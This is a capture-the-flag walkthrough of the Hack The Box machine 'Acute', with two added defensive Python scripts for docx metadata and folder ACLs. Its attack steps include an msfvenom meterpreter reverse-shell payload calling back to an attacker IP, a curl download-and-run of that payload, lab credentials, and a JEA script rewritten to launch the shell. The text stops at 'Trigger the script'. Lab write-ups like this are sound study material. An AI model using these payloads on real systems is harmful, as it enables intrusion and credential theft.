# HTB - Acute

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FTSg38jqjIwlbbkDoAihz%2FAcute.png?alt=media&#x26;token=3dc4e277-9623-4a68-93c9-379a72e3db23" alt=""><figcaption></figcaption></figure>

## Machine Info

Acute is a hard Windows machine that starts with a website on port `443`. The certificate of the website reveals the domain name `atsserver.acute.local`. Looking around the website, several employees are mentioned, and with this information it is possible to construct a list of possible users on the remote machine. Enumerating the website reveals a form with procedures for newcomers to the company. The form reveals the default password that all accounts are initially set up with. It also reveals a link to a `Windows PowerShell Web Access` (PSWA) session. Combining all the information gathered during enumeration, an attacker is able to get into a PowerShell session as the user `edavies` on `Acute-PC01`. Then, it is discovered that the user `edavies` is also logged on through an interactive session. By spying on the actions of `edavies`, the clear-text password of the `imonks` user for `ATSSERVER` can be retrieved. The user `imonks` runs under `Just Enough Administration` (JEA) on `ATSSERVER`, but even with the limited command set an attacker is able to modify a script on `ATSSERVER` in order to make `edavies` a local administrator on `Acute-PC01`. Now that `edavies` is a local administrator, the `HKLM\sam` and `HKLM\system` hives can be retrieved from the system in order to extract the password hashes of all the users. The administrator hash turns out to be crackable, and the clear-text password is reused for `awallace` on `ATSSERVER`. The user `awallace` is able to create `BAT` scripts in a directory where the user `Lois` will execute them. `Lois` has the rights to add `imonks` to the `site_admin` group, which in turn has write access to the `Domain Admins` group. So, after `imonks` is added to the `site_admin` group, he can add himself to the `Domain Admins` group and acquire administrative privileges.

## Enumeration

***

**Scope**

> IP Address: 10.10.11.145

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
443/tcp open  https

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_ssl-date: 2024-07-22T08:03:32+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

```
* Open ports: 443 
* Services: HTTPS
* Important notes: DNS:atsserver.acute.local, DNS:atsserver
```

First, I added the domain name, FQDN and computer name to the hosts file:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ sudo sh -c "echo  '$ip acute.local atsserver.acute.local atsserver' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.145 acute.local atsserver.acute.local atsserver
```

***

**HTTP Enumeration**

Subdomain enumeration did not find anything:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/GreenHorn]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.acute.local" -k -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/  

:: Progress: [19966/19966] :: Job [1/1] :: 208 req/sec :: Duration: [0:01:35] :: Errors: 0 ::
```

`https://acute.local/`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FQ4pWeDAZycHH5E7Hnwll%2FPasted%20image%2020240722110801.png?alt=media&#x26;token=9ee7b615-d51b-4925-bfa4-8d39f392129f" alt=""><figcaption></figcaption></figure>

However, `atsserver.acute.local` hosts a web application:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FAqutclvCp1jw8iLLStrr%2FPasted%20image%2020240722110851.png?alt=media&#x26;token=d9ee0747-9b4d-4e7f-9313-6697be683221" alt=""><figcaption></figcaption></figure>

Several users are listed, but I need to know the username format:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FlOxAsfljkZW1eX0YYteG%2FPasted%20image%2020240722111114.png?alt=media&#x26;token=aacacdba-0621-471f-bfb2-e9343af807c4" alt=""><figcaption></figcaption></figure>

In the top right of the page, there is a link to a `.docx` file:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FG8rgYr8wpkJzsUmNDkJI%2FPasted%20image%2020240722111649.png?alt=media&#x26;token=b36019ba-7ec6-4875-bf87-463c504eea70" alt=""><figcaption></figcaption></figure>

When I clicked it, the file was downloaded to my Kali machine, so I will explore it locally.

Looking at the file details:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ exiftool New_Starter_CheckList_v7.docx 
<snip>
Zip File Name                   : [Content_Types].xml
Creator                         : FCastle
Description                     : Created on Acute-PC01
Last Modified By                : Daniel
<snip>
```

The creator of the file is `FCastle`, who is not in my user list, so I will add him first, along with `Daniel`, by whom the file was last modified. The metadata also hints that the username format is `first letter of the first name + last name`, so the user list should look like this:

```
Fcastle
Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins
```

Another important detail is `Created on Acute-PC01`, which tells us that there is a computer named `Acute-PC01`.

So we now have two computer names:

```
atsserver
Acute-PC01
```
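The document metadata that exiftool surfaced above (creator, last modifier, a description naming the host) is exactly what a publisher should strip before putting a file on a public site. As an added example that is not part of the original write-up, the following script audits and scrubs those fields in a `.docx` (a zip archive whose `docProps/core.xml` and `docProps/app.xml` parts hold them); the sample document is constructed in memory with the values seen on Acute.

```python
# Added example (not part of the original write-up): audit a .docx for the
# identifying metadata that exiftool surfaced (creator, last modifier,
# description with a hostname) and scrub it before publication. A .docx is
# a zip archive; those fields live in docProps/core.xml and docProps/app.xml.
# The sample document is constructed in memory with the values seen on Acute.
import io
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

# Fields that commonly leak usernames, hostnames or internal names.
PARTS = {
    "docProps/core.xml": ("dc:creator", "cp:lastModifiedBy", "dc:description", "dc:title"),
    "docProps/app.xml": ("ep:Company", "ep:Manager"),
}


def _qname(tag: str) -> str:
    """'dc:creator' -> '{http://purl.org/dc/elements/1.1/}creator'."""
    prefix, local = tag.split(":")
    return "{%s}%s" % (NS[prefix], local)


def build_sample_docx() -> bytes:
    """Constructed sample: a minimal docx carrying the metadata found on Acute."""
    core = (
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>FCastle</dc:creator>"
        "<dc:description>Created on Acute-PC01</dc:description>"
        "<cp:lastModifiedBy>Daniel</cp:lastModifiedBy>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"])
    )
    app = (
        '<Properties xmlns="%s"><Application>Microsoft Office Word</Application>'
        "<Company></Company></Properties>" % NS["ep"]
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder parts only
        zf.writestr("docProps/core.xml", core)
        zf.writestr("docProps/app.xml", app)
        zf.writestr("word/document.xml", "<document/>")
    return buf.getvalue()


def audit_docx(data: bytes) -> dict:
    """Return {field: value} for every non-empty identifying field found."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part, fields in PARTS.items():
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for field in fields:
                el = root.find(_qname(field))
                if el is not None and (el.text or "").strip():
                    findings[field] = el.text.strip()
    return findings


def scrub_docx(data: bytes) -> bytes:
    """Return a copy of the docx with every identifying field blanked."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            payload = src.read(item.filename)
            if item.filename in PARTS:
                root = ET.fromstring(payload)
                for field in PARTS[item.filename]:
                    el = root.find(_qname(field))
                    if el is not None:
                        el.text = ""
                payload = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            dst.writestr(item.filename, payload)
    return out.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx()
    print("before:", audit_docx(doc))                # creator, description, lastModifiedBy
    print("after: ", audit_docx(scrub_docx(doc)))   # {}
```

Running `audit_docx` over a real file before publishing catches the same leak the write-up relied on; `scrub_docx` rewrites the package with those fields emptied.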

I opened the docx file and it looks like this:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FOUm2OonvEVtZMKBy2Eyp%2FPasted%20image%2020240722112829.png?alt=media&#x26;token=acc8c71a-fbd1-4720-b446-1d198668437e" alt=""><figcaption></figcaption></figure>

There are two new links that I want to explore.

```
https://atsserver.acute.local/Staff
https://atsserver.acute.local/Staff/Induction
```

Both pages respond with 404:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FfYxiBFo3wbYhPZLNaCr2%2FPasted%20image%2020240722113007.png?alt=media&#x26;token=fc2983f1-b51f-4d8c-ac46-48abedad790b" alt=""><figcaption></figcaption></figure>

This row tells us that the default password is `Password1!` and that several users still have this password:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F2PqLLNzTznDdlQ2TLvBO%2FPasted%20image%2020240722113139.png?alt=media&#x26;token=c2377f6d-af08-496b-8493-8b5e2a1ef0e1" alt=""><figcaption></figcaption></figure>

`PSWA` means PowerShell Web Access, and `dc_manage` seems to be some kind of restricted configuration:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F4xEV9x41nVfeWvwwczGU%2FPasted%20image%2020240722113437.png?alt=media&#x26;token=75e06782-4d3b-4412-ac7e-4cd029ebe81b" alt=""><figcaption></figcaption></figure>

The last row has a link; when clicked, it takes me to `https://atsserver.acute.local/Acute_Staff_Access`:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FXhEUES9gMMXGpn6KOfvD%2FPasted%20image%2020240722113636.png?alt=media&#x26;token=88ff51c3-ff73-4f26-956a-36fc5f85a564" alt=""><figcaption></figcaption></figure>

At the end, I can see that there is a group named `site admin`, and `Lois` has control of it:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FWLn81MxQ7wJ8hhI761mT%2FPasted%20image%2020240722113755.png?alt=media&#x26;token=0f3bb0f7-9435-4888-8f47-d8ab6e75ea6c" alt=""><figcaption></figcaption></figure>

## **Shell as Edavies**

`https://atsserver.acute.local/Acute_Staff_Access`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F4PM4snl51LspAuO1fRaF%2FPasted%20image%2020240722113923.png?alt=media&#x26;token=e88245af-0d70-4236-8a73-f3bee989a22c" alt=""><figcaption></figcaption></figure>

It's a PowerShell Web Access console. I have the password, two computer names and several users, so I will try them.

When wrong credentials are provided, this message appears:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F7QstBVagI3i96VDv59Ea%2FPasted%20image%2020240722114115.png?alt=media&#x26;token=c33d1ceb-7a55-43e3-9d5f-f9d4fa48340a" alt=""><figcaption></figcaption></figure>

A different message appears for the user `Chall`, saying that we aren't authorized to connect to that computer name, so I will try the other one.

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2Foj5ESi05BpN1e80Jft27%2FPasted%20image%2020240722114519.png?alt=media&#x26;token=1c193f53-87e5-4642-ab66-ca72182cc12d" alt=""><figcaption></figcaption></figure>

When I changed the computer name to `Acute-PC01` and tried to authenticate as `chall`, it also failed. However, when I tried with `Edavies`, it took me to the PowerShell console.

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FGob77uNlqbqLWBQN254O%2FPasted%20image%2020240722114913.png?alt=media&#x26;token=6f31dbf5-c5a5-4e7c-b988-aba3f1d34510" alt=""><figcaption></figcaption></figure>

`Jmorgan` and `Natasha` exist on the machine along with `edavies`:

```bash
PS C:\Users> dir

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/21/2021   1:01 PM                administrator.ACUTE
d-----        12/22/2021   1:26 AM                edavies
d-----        12/21/2021  10:50 PM                jmorgan
d-----        11/19/2021   9:29 AM                Natasha
d-r---        11/18/2020  11:43 PM                Public
```

```powershell
PS C:\Users> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==============================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
```

I wanted to see who is a member of `Remote Management Users`, but querying it as a domain group failed, so I switched to querying the local group and got a result:

```bash
PS C:\Users> net group "Remote Management Users"

net : This command can be used only on a Windows Domain Controller.
    + CategoryInfo          : NotSpecified: (This command ca...ain Controller.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
More help is available by typing NET HELPMSG 3515.

PS C:\Users> net localgroup "Remote Management Users"

Members
-------------------------------------------------------------------------------
ACUTE\edavies
The command completed successfully.
```

I also looked at the `administrators` group and found that `Jmorgan` is a member of it:

```powershell
PS C:\Users> net localgroup "administrators"

Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
```

I need to upgrade my shell, so I can use either an `nc` or a `meterpreter` shell. In our situation, a `meterpreter` shell is better, and we will see why in a few steps.

At the root of the file system, there is a non-standard folder, `Utils`:

```powershell
PS C:\> dir

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----

d-----         12/7/2019   9:14 AM                PerfLogs
d-r---         12/6/2021  11:06 AM                Program Files
d-r---         12/7/2021  12:43 PM                Program Files (x86)
d-r---        12/21/2021  10:50 PM                Users
d-----         1/31/2022  12:29 AM                Utils
d-----        12/16/2021   1:23 AM                Windows
```

Viewing the folder permissions, I found that `edavies` has the `(M) modify` permission, which means he can `Read, Write, Execute, Delete`:

```powershell
PS C:\> icacls Utils

Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
      BUILTIN\Administrators:(OI)(CI)(F)
      ACUTE\edavies:(OI)(CI)(M)
      BUILTIN\Users:(OI)(CI)(R)
```

I don't know why this folder exists, but I will continue from it since I have write permissions on it.
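A world-writable (or here, user-writable) folder directly under `C:\` is the kind of ACL finding a defender wants flagged automatically. As an added example that is not part of the original write-up, the following script parses the text `icacls <folder>` prints, as run above on `Utils`, and reports every allow ACE that grants write-capable rights to a principal outside the usual privileged set; the first listing is the write-up's own output, the second is constructed to show a deny ACE and a specific-rights ACE being handled.

```python
# Added example (not part of the original write-up): parse `icacls <folder>`
# output and flag write-capable ACEs held by non-privileged principals.
import re

# Principals expected to hold full control on folders under C:\.
TRUSTED = {
    r"NT AUTHORITY\SYSTEM",
    r"BUILTIN\Administrators",
    r"NT SERVICE\TrustedInstaller",
    r"CREATOR OWNER",
}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}            # inheritance, not rights
WRITE_SIMPLE = {"F", "M", "W"}                           # full / modify / write
WRITE_SPECIFIC = {"WD", "AD", "WDAC", "WO", "DC", "D"}   # write data, append data,
                                                         # write DACL/owner, delete

# The write-up's icacls run on C:\Utils, copied as printed.
UTILS_OUTPUT = r"""
Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
      BUILTIN\Administrators:(OI)(CI)(F)
      ACUTE\edavies:(OI)(CI)(M)
      BUILTIN\Users:(OI)(CI)(R)
"""

# Constructed listing: a deny ACE (must not be reported) and a specific-rights
# ACE that includes write-data (must be reported).
SCRIPTS_OUTPUT = r"""
Scripts NT AUTHORITY\SYSTEM:(OI)(CI)(F)
        BUILTIN\Administrators:(OI)(CI)(F)
        ACUTE\edavies:(DENY)(OI)(CI)(W)
        BUILTIN\Users:(OI)(CI)(RX,WD)
Successfully processed 1 files; Failed processing 0 files
"""


def parse_ace(text: str):
    r"""'ACUTE\edavies:(OI)(CI)(M)' -> ('ACUTE\edavies', {'M'}, is_deny)."""
    who, _, rights = text.partition(":(")
    tokens = re.findall(r"\(([^)]*)\)", "(" + rights)
    granted = set()
    for tok in tokens:
        if tok in INHERIT_FLAGS or tok == "DENY":
            continue
        granted.update(r.strip() for r in tok.split(","))   # e.g. "RX,WD"
    return who.strip(), granted, "DENY" in tokens


def grants_write(rights: set) -> bool:
    """True if any simple or specific right lets the holder change content."""
    return bool(rights & (WRITE_SIMPLE | WRITE_SPECIFIC))


def weak_write_aces(folder: str, output: str) -> list:
    """(folder, principal, rights) for every non-trusted allow ACE with write."""
    findings = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(folder + " "):        # first ACE shares the folder line
            line = line[len(folder) + 1:].strip()
        if ":(" not in line:                     # blank or summary line
            continue
        who, rights, deny = parse_ace(line)
        if deny or who in TRUSTED:
            continue
        if grants_write(rights):
            findings.append((folder, who, sorted(rights)))
    return findings


if __name__ == "__main__":
    for folder, out in (("Utils", UTILS_OUTPUT), ("Scripts", SCRIPTS_OUTPUT)):
        for hit in weak_write_aces(folder, out):
            print("writable by non-admin:", hit)
```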

Creating a `meterpreter` shell:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=443 -f exe -o shell.exe

Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
```

Starting the `Metasploit` framework and listening:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfconsole -q                                                                                 
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:443 
```

Download the shell and execute it.

```powershell
PS C:\Utils> curl 10.10.16.7/shell.exe -o .\shell.exe
PS C:\Utils> .\shell.exe
```

Receiving a connection back:

```bash
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.16.7:443 -> 10.10.11.145:49848) at 2024-07-22 05:06:10 -0400

meterpreter > getuid
Server username: ACUTE\edavies
```

## **Shell as imonks**

> Personally, I didn't know what to do next, as no escalation path was clear to me, so I got a hint that you can use the `screenshare` feature of the `meterpreter` session to capture desktop screenshots.

```bash
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/study/Courses/HackThebox/HTB/machines/Acute/UjBPiFCw.html
[*] Streaming...
```

An HTML page opens, and I waited for something useful to appear:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FYdWF2xDCwdfj3hhhFtbx%2FPasted%20image%2020240722120948.png?alt=media&#x26;token=d5abae12-3d35-4379-84db-c572102302c6" alt=""><figcaption></figcaption></figure>

If you get an error like this:

```bash
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
```

use the following command:

```bash
meterpreter > screenshare --interact 1 --timeout 30000
```

After a few moments, a new PowerShell console is opened and several commands are entered:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FO9ODJMuqkt8crLBgTGrH%2FPasted%20image%2020240722121520.png?alt=media&#x26;token=7c26a3a6-a471-46fd-bc9b-2cbe1b6550ff" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FRhmM6MnGlP7ifXMZuEKy%2FPasted%20image%2020240722122132.png?alt=media&#x26;token=d7daccd3-609d-41e5-923c-171f245d1496" alt=""><figcaption></figcaption></figure>

```powershell
Enter-PSsession -Computername atsserver
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd) 
```

I now have new user credentials: `imonks:W3_4R3_th3_f0rce.`

I also notice that the `Enter-PSSession` attempt failed, and that it used the `dc_manage` session configuration.

From meterpreter, I started a shell and tried to execute commands as `imonks`:

```powershell
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd)
```

`Enter-PSSession` failed as we saw in the screenshot, so I tried `Invoke-Command`, which succeeded :)

```powershell
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami}
acute\imonks
```

```powershell
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls -Recurse C:\Users\imonks}

    Directory: C:\Users\imonks

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
d-r---        21/12/2021     22:29                Desktop                            atsserver                         
d-r---        21/12/2021     16:01                Documents                          atsserver                         
d-r---        15/09/2018     08:12                Downloads                          atsserver                         
d-r---        15/09/2018     08:12                Favorites                          atsserver                         
d-r---        15/09/2018     08:12                Links                              atsserver                         
d-r---        15/09/2018     08:12                Music                              atsserver                         
d-r---        15/09/2018     08:12                Pictures                           atsserver                         
d-----        15/09/2018     08:12                Saved Games                        atsserver                         
d-r---        15/09/2018     08:12                Videos                             atsserver                         

    Directory: C:\Users\imonks\Desktop

Mode                 LastWriteTime         Length Name                               PSComputerName                    
----                 -------------         ------ ----                               --------------                    
-ar---        22/07/2024     08:58             34 user.txt                           atsserver                         
-a----        11/01/2022     18:04            602 wm.ps1                             atsserver  
```

The user flag is there along with the `wm.ps1` file:

```powershell
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\user.txt}

42fd899d0cffc822513f80xxxxxxxxxxxxx
```

> User Flag: 42fd899d0cffc822513xxxxxxxxxxxxx

## **Shell as Jmorgan**

`wm.ps1` contains PowerShell credentials of the `Jmorgan` user, who we know is a local admin on `Acute-PC01`:

```powershell
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
```

I couldn't run the script as is as `Edavies`, because he isn't the user who created this file (a standard string produced by `ConvertFrom-SecureString` without a key is protected with DPAPI under the creating user's profile, so only that user on that machine can turn it back into a `SecureString`). So I will run the script as `imonks` to get a shell as `jmorgan`.

But first I will modify this script to send me a shell.

Creating a meterpreter shell to receive the connection as `jmorgan`:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=8443 -f exe -o jmorgan.exe

Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: jmorgan.exe
```

Start listening with `Metasploit`:

```bash
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:8443 
msf6 exploit(multi/handler) > jobs

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://10.10.16.7:8443
```

I want to modify the `wm.ps1` script, so I ran `Get-Command` to see which commands are available to me in the `dc_manage` session:

```powershell
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Command}      
CommandType     Name                                               Version    Source               PSComputerName      
-----------     ----                                               -------    ------               --------------      
Cmdlet          Get-Alias                                          3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-ChildItem                                      3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-Command                                        3.0.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-Content                                        3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Get-Location                                       3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Set-Content                                        3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Set-Location                                       3.1.0.0    Microsoft.PowerSh... atsserver           
Cmdlet          Write-Output                                       3.1.0.0    Microsoft.PowerSh... atsserver           


PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Alias}      
CommandType     Name                                               Version    Source               PSComputerName      
-----------     ----                                               -------    ------               --------------      
Alias           cat -> Get-Content                                                                 atsserver           
Alias           cd -> Set-Location                                                                 atsserver           
Alias           echo -> Write-Output                                                               atsserver           
Alias           ls -> Get-ChildItem                                                                atsserver           
Alias           pwd -> Get-Location                                                                atsserver           
Alias           sc -> Set-Content                                                                  atsserver           
Alias           type -> Get-Content                                                                atsserver 
```

The session exposes `Set-Content`, so I will use it to replace the script with the following content:

```powershell
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51"
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds' -Path C:\Users\imonks\Desktop\wm.ps1}
```

Check that everything is correct:

```powershell
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}

$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51"
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds
```

Trigger the script:

```powershell
